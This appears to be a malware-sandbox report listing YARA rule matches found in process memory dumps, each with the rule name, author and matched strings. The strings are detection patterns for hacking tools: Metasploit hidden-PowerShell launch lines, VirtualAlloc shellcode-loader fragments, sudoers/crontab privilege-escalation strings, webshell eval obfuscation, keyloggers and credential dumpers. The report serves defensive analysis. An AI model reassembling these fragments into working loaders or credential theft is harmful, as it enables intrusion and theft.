| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Recon_Commands_Windows_Gen1 | Detects a set of reconnaissance commands on Windows systems | Florian Roth | - 0x1a23:$s1: netstat -an
- 0x23a94:$s3: net user
- 0x23aa2:$s3: net user
- 0x1a8c:$s4: whoami
- 0x23abe:$s7: net localgroup administrators
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x29ab9:$a1: set /p "=4d5a
- 0x29acb:$a2: powershell -Command "$hex=
- 0x29aea:$b1: set+%2Fp+%22%3D4d5
- 0x29b01:$b2: powershell+-Command+%22%24hex
- 0x29b23:$c1: echo 4d 5a
- 0x29b33:$c2: echo r cx >>
- 0x29b44:$d1: echo+4d+5a+
- 0x29b54:$d2: echo+r+cx+%3E%3E
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Exploit_MS15_077_078 | MS15-078 / MS15-077 exploit - generic signature | Florian Roth | - 0xab2e:$s1: GDI32.DLL
- 0x2212e:$s1: GDI32.DLL
- 0xab4a:$s3: AddFontMemResourceEx
- 0xab63:$s4: NamedEscape
- 0xab73:$s5: CreateBitmap
- 0xab84:$s6: DeleteObject
- 0xab96:$op0: 83 45 E8 01 EB 07 C7 45 E8
- 0xaba5:$op1: 8D 85 24 42 FB FF 89 04 24 E8 80 22 00 00 C7 45
- 0xabbb:$op2: EB 54 8B 15 6C 00 4C 00 8D 85 24 42 FB FF 89 44
- 0xabd1:$op3: 64 00 88 FF 84 03 70 03
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | DeepPanda_htran_exe | Hack Deep Panda - htran-exe | Florian Roth | - 0x22642:$s3: [SERVER]connection to %s:%d error
- 0x22668:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort>
- 0x22754:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
- 0x227c3:$s20: -listen <ConnectPort> <TransmitPort>
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | CN_Toolset_NTscan_PipeCmd | Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe | Florian Roth | - 0x20fdf:$s2: Please Use NTCmd.exe Run This Program.
- 0x2101d:$s4: \\.\pipe\%s%s%d
- 0x2100a:$s5: %s\pipe\%s%s%d
- 0x21031:$s6: %s\ADMIN$\System32\%s%s
- 0x21031:$s7: %s\ADMIN$\System32\%s
- 0x20fbc:$s9: PipeCmdSrv.exe
- 0x2104d:$s10: This is a service executable! Couldn't start directly.
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x2101d:$: \\.\pipe\%s%s%d
- 0x21033:$: \ADMIN$\System32\%s%s
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | power_pe_injection | PowerShell with PE Reflective Injection | Benjamin DELPY (gentilkiwi) | - 0x225e:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | apt_equation_equationlaser_runtimeclasses | Rule to detect the EquationLaser malware | unknown | - 0x192e3:$a1: ?a73957838_2@@YAXXZ
- 0x192fb:$a2: ?a84884@@YAXXZ
- 0x1930e:$a3: ?b823838_9839@@YAXXZ
- 0x19327:$a4: ?e747383_94@@YAXXZ
- 0x1933e:$a5: ?e83834@@YAXXZ
- 0x19351:$a6: ?e929348_827@@YAXXZ
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | apt_equation_cryptotable | Rule to detect the crypto library used in Equation group malware | unknown | - 0x19432:$a: 37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 ...
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | EquationDrug_HDDSSD_Op | EquationDrug - HDD/SSD firmware operation - nls_933w.dll | Florian Roth @4nc4p | - 0x1a2b1:$s0: nls_933w.dll
- 0x1ab63:$s0: nls_933w.dll
- 0x1ac2d:$s0: nls_933w.dll
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_obfuscated_encoding | PHP webshell obfuscated by encoding | Arnim Rupp | - 0x14e8:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x14e8:$enc_eval2: \x65\x76\x61\x6C\x28
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_by_string_known_webshell | Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions. | Arnim Rupp | - 0xbab:$pbs6: 0de664ecd2be02cdd54234a0d1229b43
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_by_string_obfuscation | PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming | Arnim Rupp | - 0xd69:$opbs16: 'ev'.'al'
- 0xd69:$opbs31: 'ev'.'al'
- 0x14e8:$opbs77: \x65\x76\x61\x6C\x28
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | FVEY_ShadowBrokers_Jan17_Screen_Strings | Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits | Florian Roth | - 0x1bdab:$x1: Danderspritz
- 0x1bdbc:$x2: DanderSpritz
- 0x1bdcd:$x3: PeddleCheap
- 0x1bddd:$x4: ChimneyPool Addres
- 0x1bdf4:$a1: Getting remote time
- 0x1be0c:$a2: RETRIEVED
- 0x1be1a:$b1: Added Ops library to Python search path
- 0x1be46:$b2: target: z0.0.0.1
- 0x1be5b:$c1: Psp_Avoidance
- 0x1be6d:$c2: PasswordDump
- 0x1be8c:$c4: EventLogEdit
- 0x1beaf:$d1: Mcl_NtElevation
- 0x1bec3:$d2: Mcl_NtNativeApi
- 0x1bed7:$d3: Mcl_ThreatInject
- 0x1beec:$d4: Mcl_NtMemory
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | doublepulsarxor_petya | rule to hit on the xored doublepulsar shellcode | patrick jones | - 0x1c202:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC ...
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | doublepulsardllinjection_petya | rule to hit on the xored doublepulsar dll injection shellcode | patrick jones | - 0x1c456:$doublepulsardllinjection_petya: 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 ...
|
| 00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Meterpreter_Reverse_Tcp | Meterpreter reverse TCP backdoor in memory. Tested on Win7x64. | chort (@chort0) | - 0x1c524:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x1c536:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_exploit_cve_5889 | http://www.cvedetails.com/cve/cve-2015-5889 | @mimeframe | - 0x594c3:$a1: /etc/sudoers
- 0x594d4:$a2: /etc/crontab
- 0x594e5:$a3: * * * * * root echo
- 0x594fd:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x5951d:$a5: /usr/bin/rsh
- 0x178d0:$a6: localhost
- 0x24b89:$a6: localhost
- 0x5952e:$a6: localhost
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_exploit_tpwn | tpwn exploits a null pointer dereference in XNU to escalate privileges to root. | @mimeframe | - 0x59609:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x59637:$a2: leaked kaslr slide,
- 0x5964f:$a3: didn't get root, but this system is vulnerable.
- 0x59683:$a4: Escalating privileges! -qwertyoruiop
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_juuso_keychaindump | For reading OS X keychain passwords as root. | @mimeframe | - 0x59749:$a1: [-] Too many candidate keys to fit in memory
- 0x5977a:$a2: [-] Could not allocate memory for key search
- 0x597ab:$a3: [-] Too many credentials to fit in memory
- 0x597d9:$a4: [-] The target file is not a keychain file
- 0x59808:$a5: [-] Could not find the securityd process
- 0x59835:$a6: [-] No root privileges, please run with sudo
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_b4rsby_swiftlog | Dirty user level command line keylogger hacked together in Swift. | @mimeframe | - 0x5991c:$a1: You need to enable the keylogger in the System Prefrences
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_caseyscarborough | A simple and easy to use keylogger for macOS. | @mimeframe | - 0x59a08:$a1: /var/log/keystroke.log
- 0x59b45:$a1: /var/log/keystroke.log
- 0x59a23:$a2: ERROR: Unable to create event tap.
- 0x59d9f:$a2: ERROR: Unable to create event tap.
- 0x59a4a:$a3: Keylogging has begun.
- 0x59a64:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_dannvix | A simple keylogger for macOS. | @mimeframe | - 0x59a08:$a1: /var/log/keystroke.log
- 0x59b45:$a1: /var/log/keystroke.log
- 0x59b60:$a2: <forward-delete>
- 0x59b75:$a3: <unknown>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_eldeveloper_keystats | A simple keylogger for macOS. | @mimeframe | - 0x59c1f:$a1: YVBKeyLoggerPerishedNotification
- 0x59c44:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x59c79:$a3: YVBKeyLoggerPerishedByUserChangeNotification
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_giacomolaw | A simple keylogger for macOS. | @mimeframe | - 0x59d3c:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x59a23:$a2: ERROR: Unable to create event tap.
- 0x59d9f:$a2: ERROR: Unable to create event tap.
- 0x59dc6:$a3: Keystrokes are now being recorded
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_logkext | LogKext is an open source keylogger for Mac OS X, a product of FSB software. | @mimeframe | - 0x59ea7:$a1: logKextPassKey
- 0x59f80:$a1: logKextPassKey
- 0x59eba:$a2: Couldn't get system keychain:
- 0x59edc:$a3: Error finding secret in keychain
- 0x59f01:$a4: com_fsb_iokit_logKext
- 0x59f1b:$b1: logKext Password:
- 0x59f31:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x59ea7:$c1: logKextPassKey
- 0x59f80:$c1: logKextPassKey
- 0x59f93:$c2: Error: couldn't create secAccess
- 0x59fb8:$d1: IOHIKeyboard
- 0x59fc9:$d2: Clear keyboards called with kextkeys
- 0x59ff2:$d3: Added notification for keyboard
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_roxlu_ofxkeylogger | ofxKeylogger keylogger. | @mimeframe | - 0x5a0a8:$a1: keylogger_init
- 0x5a0bb:$a2: install_keylogger_hook function not found in dll.
- 0x5a0f1:$a3: keylogger_set_callback
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_skreweverything_swift | It is a simple and easy to use keylogger for macOS written in Swift. | @mimeframe | - 0x5a1db:$a1: Can't create directories!
- 0x5a1f9:$a2: Can't create manager
- 0x5a212:$a3: Can't open HID!
- 0x5a226:$a4: PRINTSCREEN
- 0x5a236:$a5: LEFTARROW
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_macpmem | MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers. | @mimeframe | - 0x5a32b:$a1: %s/MacPmem.kext
- 0x5a33f:$a2: The Pmem physical memory imager.
- 0x5a364:$a3: The OSXPmem memory imager.
- 0x5a383:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x5a3e4:$a5: Pmem driver version incompatible. Reported
- 0x5a413:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x5a459:$b1: Unloading MacPmem
- 0x5a46f:$b2: MacPmem load tag is
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_icloudcontacts | Pulls iCloud Contacts for an account. No dependencies. No user notification. | @mimeframe | - 0x5a550:$a1: https://setup.icloud.com/setup/authenticate/
- 0x5a581:$a2: https://p04-contacts.icloud.com/
- 0x5a5a6:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x5a5f2:$a4: HTTP Error 404: URL not found. Did you enter a username?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_mmetokendecrypt | This program decrypts / extracts all authorization tokens on macOS / OS X / OSX. | @mimeframe | - 0x5a6fe:$a1: security find-generic-password -ws 'iCloud'
- 0x5a72e:$a2: ERROR getting iCloud Decryption Key
- 0x5a756:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x5a79a:$a4: Decrypting token plist ->
- 0x5a7b8:$a5: Successfully decrypted token plist!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_osxchromedecrypt | Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X. | @mimeframe | - 0x5a8ad:$a1: Credit Cards for Chrome Profile
- 0x5a8d1:$a2: Passwords for Chrome Profile
- 0x5a8f2:$a3: Unknown Card Issuer
- 0x5a90a:$a4: ERROR getting Chrome Safe Storage Key
- 0x5a934:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x5a998:$b2: select username_value, password_value, origin_url, submit_element from logins
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_n0fate_chainbreaker | chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner. | @mimeframe | - 0x5aad7:$a1: [!] Private Key Table is not available
- 0x5ab02:$a2: [!] Public Key Table is not available
- 0x5ab2c:$a3: [-] Decrypted Private Key
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_ptoomey3_keychain_dumper | Keychain dumping utility. | @mimeframe | - 0x5ab5e:$a1: keychain_dumper
- 0x5abe0:$a1: keychain_dumper
- 0x5abf4:$a2: /var/Keychains/keychain-2.db
- 0x5ac15:$a3: <key>keychain-access-groups</key>
- 0x5ac3b:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x5ac83:$a5: dumpEntitlements
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_bloodhound_owned | Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains | @fusionrace | - 0x5ad95:$s1: Find all owned Domain Admins
- 0x5adb6:$s2: Find Shortest Path from owned node to Domain Admins
- 0x5adee:$s3: List all directly owned nodes
- 0x5ae10:$s4: Set owned and wave properties for a node
- 0x5ae3d:$s5: Find spread of compromise for owned nodes in wave
- 0x5ae73:$s6: Show clusters of password reuse
- 0x5ae97:$s7: Something went wrong when creating SharesPasswordWith relationship
- 0x5aede:$s8: reference doc of custom Cypher queries for BloodHound
- 0x5af18:$s9: Created SharesPasswordWith relationship between
- 0x5af4d:$s10: Skipping finding spread of compromise due to
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_jtesta_ssh_mitm | intercepts ssh connections to capture credentials | @fusionrace | - 0x5b01b:$a1: INTERCEPTED PASSWORD:
- 0x5b035:$a2: more sshbuf problems.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_masscan | masscan is a performant port scanner, it produces results similar to nmap | @mimeframe | - 0x5b105:$a1: EHLO masscan
- 0x5b116:$a2: User-Agent: masscan/
- 0x5b12f:$a3: /etc/masscan/masscan.conf
- 0x5b14d:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x5b18d:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x5b1cd:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x5b212:$b4: [hint] VMware on Macintosh doesn't support masscan
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_ncc_ABPTTS | Allows for TCP tunneling over HTTP | @mimeframe | - 0x5b2d1:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x5b305:$s2: https://vulnerableserver/EStatus/
- 0x5b32b:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x5b37a:$s4: tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq
- 0x5b3a3:$s5: 63688c4f211155c76f2948ba21ebaf83
- 0x5b3c8:$s6: ABPTTSClient-log.txt
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_ntlmrelayx | https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/ | @mimeframe | - 0x5b4b5:$a1: Started interactive SMB client shell via TCP
- 0x5b4e6:$a2: Service Installed.. CONNECT!
- 0x5b507:$a3: Done dumping SAM hashes for host:
- 0x5b52d:$a4: DA already added. Refusing to add another
- 0x5b55b:$a5: Domain info dumped into lootdir!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_pyrasite_py | A tool for injecting arbitrary code into running Python processes. | @fusionrace | - 0x5b62b:$s1: WARNING: ptrace is disabled. Injection will not work.
- 0x5b665:$s2: A payload that connects to a given host:port and receives commands
- 0x5b6ac:$s3: A reverse Python connection payload.
- 0x5b6d5:$s4: pyrasite - inject code into a running python process
- 0x5b70e:$s5: The ID of the process to inject code into
- 0x5b73c:$s6: This file is part of pyrasite.
- 0x5b5f0:$s7: https://github.com/lmacken/pyrasite
- 0x5b75f:$s7: https://github.com/lmacken/pyrasite
- 0x5b787:$s8: Setup a communication socket with the process by injecting
- 0x5b7c6:$s9: a reverse subshell and having it connect back to us.
- 0x5b800:$s10: Write out a reverse python connection payload with a custom port
- 0x5b846:$s11: Wait for the injected payload to connect back to us
- 0x5b87f:$s12: PyrasiteIPC
- 0x5b890:$s13: A reverse Python shell that behaves like Python interactive interpreter.
- 0x5b8de:$s14: pyrasite cannot establish reverse
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_responder_py | Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server | @fusionrace | - 0x5ba10:$s1: Poison all requests with another IP address than Responder's one.
- 0x5ba56:$s2: Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
- 0x5baaa:$s3: Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network.
- 0x5bb1c:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bc06:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bb73:$s5: Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)
- 0x5bbd2:$s6: 31mOSX detected, -i mandatory option is missing
- 0x5bb1c:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bc06:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_hot_potato | https://foxglovesecurity.com/2016/01/16/hot-potato/ | @mimeframe | - 0x5bcfb:$a1: Parsing initial NTLM auth...
- 0x5bd1c:$a2: Got PROPFIND for /test...
- 0x5bd3a:$a3: Starting NBNS spoofer...
- 0x5bd57:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x5bd93:$a5: Usage: potato.exe -ip
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_moyix_creddump | creddump is a python tool to extract credentials and secrets from Windows registry hives. | @mimeframe | - 0x5be71:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x5bea4:$a2: 0123456789012345678901234567890123456789
- 0x5bed1:$a3: NTPASSWORD
- 0x5bee0:$a4: LMPASSWORD
- 0x1acdc:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x5beef:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x5bf14:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_ncc_wmicmd | Command shell wrapper for WMI | @mimeframe | - 0x5bfc8:$a1: Need to specify a username, domain and password for non local connections
- 0x5c016:$a2: WS-Management is running on the remote host
- 0x5c046:$a3: firewall (if enabled) allows connections
- 0x5c073:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x5c0c3:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x5c10c:$b1: 0x800706BA
- 0x5c11b:$b2: NTLMDOMAIN:
- 0x5c12b:$b3: cimv2
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_rdp_cmd_delivery | Delivers a text payload via RDP (rubber ducky) | @fusionrace | - 0x5c1f3:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x5c21a:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x5c270:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x5c2be:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_wmi_implant | A PowerShell based tool that is designed to act like a RAT | @fusionrace | - 0x5c3e8:$s1: This really isn't applicable unless you are using WMImplant interactively.
- 0x5c437:$s2: What command do you want to run on the remote system? >
- 0x5c473:$s3: Do you want to [create] or [delete] a string registry value? >
- 0x5c4b6:$s4: Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >
- 0x5c512:$s5: What is the name of the service you are targeting? >
- 0x5c54b:$s6: This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine
- 0x5c5c5:$s7: gen_cli - Generate the CLI command to execute a command via WMImplant
- 0x5c60f:$s8: exit - Exit WMImplant
- 0x5c629:$s9: Lateral Movement Facilitation
- 0x5c64c:$s10: vacant_system - Determine if a user is away from the system.
- 0x5c68e:$s11: Please provide the ProcessID or ProcessName flag to specify the process to kill!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_mimikatz_errors | Mimikatz credential dump tool: Error messages | @fusionrace | - 0x5cb36:$s1: [ERROR] [LSA] Symbols
- 0x5cb50:$s2: [ERROR] [CRYPTO] Acquire keys
- 0x5cb72:$s3: [ERROR] [CRYPTO] Symbols
- 0x5cb8f:$s4: [ERROR] [CRYPTO] Init
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_mimikatz_sekurlsa | Mimikatz credential dump tool | @fusionrace | - 0x5d056:$s1: dpapisrv!g_MasterKeyCacheList
- 0x5d078:$s2: lsasrv!g_MasterKeyCacheList
- 0x5d098:$s3: !SspCredentialList
- 0x5d0af:$s4: livessp!LiveGlobalLogonSessionList
- 0x5d0d6:$s5: wdigest!l_LogSessList
- 0x5d0f0:$s6: tspkg!TSGlobalCredTable
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0xceb9:$s1: & "\" & "svchost.exe"
- 0xced3:$s2: CreateObject("Wscript.Shell")
- 0xdbaf:$s2: CreateObject("Wscript.Shell")
- 0xe706:$s2: CreateObject("Wscript.Shell")
- 0x14165:$s2: CreateObject("Wscript.Shell")
- 0xcef5:$s3: <% @language="VBScript" %>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0xd01a:$s1: powershell.exe -nop -w hidden -e
- 0xe170:$s1: powershell.exe -nop -w hidden -e
- 0x140f2:$s1: powershell.exe -nop -w hidden -e
- 0xd03f:$s2: Call Shell(
- 0xd04f:$s3: Sub Workbook_Open()
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0xd16d:$s1: '* PAYLOAD DATA
- 0xd181:$s2: = Shell(
- 0xd18f:$s3: = Environ("USERPROFILE")
- 0xd1ac:$s4: '**************************************************************
- 0xd1f0:$s5: ChDir (
- 0xd1fc:$s6: '* MACRO CODE
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0xd30e:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0xd35c:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0xd399:$s3: .func]::VirtualAlloc(0,
- 0xd3b5:$s4: .func+AllocationType]::Reserve -bOr [
- 0xd3df:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0xd419:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0xd46a:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0xd4af:$s8: .func]::CreateThread(0,0,$
- 0xd4ce:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0xd505:$s10: = [System.Convert]::FromBase64String("/
- 0xd532:$s11: { $global:result = 3; return }
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0xd656:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0xd67f:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0xd6b0:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0xd6eb:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0xd72a:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0xd8ab:$x1: = new System.Diagnostics.Process();
- 0xd8d3:$x2: .StartInfo.UseShellExecute = true;
- 0xd8fa:$x3: , "svchost.exe");
- 0xd910:$s4: = Path.GetTempPath();
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0xdbad:$s1: = CreateObject("Wscript.Shell")
- 0xe704:$s1: = CreateObject("Wscript.Shell")
- 0x14163:$s1: = CreateObject("Wscript.Shell")
- 0xdbd1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe6d3:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xdc02:$s3: .GetSpecialFolder(2)
- 0xdc1b:$s4: .Write Chr(CLng("
- 0xdc31:$s5: = "4d5a90000300000004000000ffff00
- 0xdc57:$s6: For i = 1 to Len(
- 0xdc6d:$s7: ) Step 2
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0xdd7a:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0xddc2:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0xddf3:$s3: = RtlMoveMemory(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0xd30e:$s1: [DllImport("kernel32.dll")]
- 0xdf08:$s1: [DllImport("kernel32.dll")]
- 0xdf28:$s2: [DllImport("msvcrt.dll")]
- 0xdf46:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0xdf7c:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0xdf9f:$s5: .Length,0x1000),0x3000,0x40)
- 0xdfc0:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0xe034:$s7: ::memset([IntPtr]($
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0xe152:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0xe268:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
